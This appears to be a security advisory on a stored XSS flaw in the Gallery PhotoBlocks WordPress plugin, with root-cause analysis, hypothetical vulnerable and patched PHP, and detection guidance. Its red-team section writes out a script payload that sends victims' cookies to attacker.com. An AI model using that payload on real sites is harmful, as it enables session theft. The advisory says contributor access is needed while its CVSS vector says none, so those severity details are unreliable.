Executive Summary

CVE-2025-58610 is a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress plugin Gallery PhotoBlocks (photoblocks-grid-gallery) by WP Chill, affecting versions up to and including 1.3.1. This vulnerability allows an authenticated attacker with contributor-level access or higher to inject arbitrary web scripts into the plugin's gallery blocks. When a site administrator or other user views the compromised gallery, the injected script executes in their browser, potentially leading to session hijacking, credential theft, or defacement. The vulnerability stems from improper neutralization of user-supplied input during web page generation. As of this report, no official patch has been released, and no public proof-of-concept code is available.

Supply Chain & Package Security

This vulnerability affects a WordPress plugin distributed via the official WordPress plugin repository. Users who have installed the plugin directly from the WordPress admin dashboard or via manual upload are at risk. The plugin is not distributed via NPM, PyPI, Go, or Ruby ecosystems.

CVSS Breakdown & Threat Level

  • CVSS Score: 6.5 (Medium)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
  • Attack Vector (AV): Network
  • Attack Complexity (AC): Low
  • Privileges Required (PR): None (but requires user interaction)
  • User Interaction (UI): Required (victim must visit the compromised page)
  • Scope (S): Changed (impact may extend beyond the vulnerable component)
  • Confidentiality (C): Low
  • Integrity (I): Low
  • Availability (A): Low

Threat Level: Medium. While the CVSS score is moderate, the stored nature of the XSS and the lack of a patch elevate the risk for sites using this plugin.

Deep Dive & Mechanics

The vulnerability resides in the photoblocks-grid-gallery plugin's handling of user input when creating or editing gallery blocks. The plugin fails to sanitize or escape input fields such as gallery titles, captions, or image metadata before storing them in the database. When the gallery is rendered on a front-end page, the unsanitized data is output directly into the HTML, allowing an attacker to inject arbitrary JavaScript.

Attack Flow:

  1. An attacker with contributor-level access (or higher) creates or edits a gallery block.
  2. The attacker injects a malicious payload (e.g., <script>alert('XSS')</script>) into a vulnerable input field (e.g., gallery title).
  3. The payload is stored in the WordPress database without proper sanitization.
  4. When an administrator or other user visits the page containing the gallery, the payload executes in their browser.
  5. The attacker can then steal cookies, session tokens, or perform actions on behalf of the victim.

Root Cause: The plugin uses functions like echo $title or the_title() without applying WordPress's built-in escaping functions such as esc_html() or wp_kses_post().

Vulnerable vs. Patched Code

Since no official patch is available, the following is a hypothetical comparison based on common remediation patterns.

Vulnerable Code (hypothetical):

// In photoblocks-grid-gallery.php or similar
function render_gallery_block($atts) {
    $title = get_post_meta($atts['id'], 'gallery_title', true);
    echo '<h2 class="gallery-title">' . $title . '</h2>'; // Unsanitized output
}

Patched Code (hypothetical):

function render_gallery_block($atts) {
    $title = get_post_meta($atts['id'], 'gallery_title', true);
    echo '<h2 class="gallery-title">' . esc_html($title) . '</h2>'; // Properly escaped
}

Exploitation & Lab Setup

Red Team (Offensive)

Prerequisites:

  • WordPress instance with Gallery PhotoBlocks <= 1.3.1 installed and activated.
  • Attacker account with at least Contributor role.

Steps:

  1. Log in to WordPress as a Contributor.
  2. Navigate to PhotoBlocks > Add New.
  3. In the gallery title field, enter the following payload:
    <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

  4. Save the gallery and publish it.
  5. Craft a link to the gallery page and send it to an administrator (social engineering).
  6. When the admin visits the page, the script executes, sending their cookies to the attacker's server.

Note: No public exploit code is available; this is a theoretical demonstration.

Blue Team (Defensive)

Detection:

  • Monitor WordPress admin logs for unusual gallery creation or editing activity.
  • Use a Web Application Firewall (WAF) to block common XSS payloads in POST requests.
  • Implement Content Security Policy (CSP) headers to restrict script execution.

Mitigation:

  • Disable or remove the plugin until a patch is released.
  • Apply a virtual patch via WAF rules to block known XSS patterns.
  • Restrict contributor-level access to trusted users only.

Indicators of Compromise (IOCs)

  • Network:
    • Outbound HTTP requests to unknown domains containing document.cookie or localStorage data.
    • Suspicious POST requests to /wp-admin/admin-ajax.php with gallery-related actions.
  • Host:
    • Unexpected JavaScript code in the wp_postmeta table under keys like gallery_title or gallery_caption.
    • Modified gallery pages containing <script> tags.
  • File:
    • Unusual entries in the WordPress debug log (wp-content/debug.log) related to the photoblocks-grid-gallery plugin.
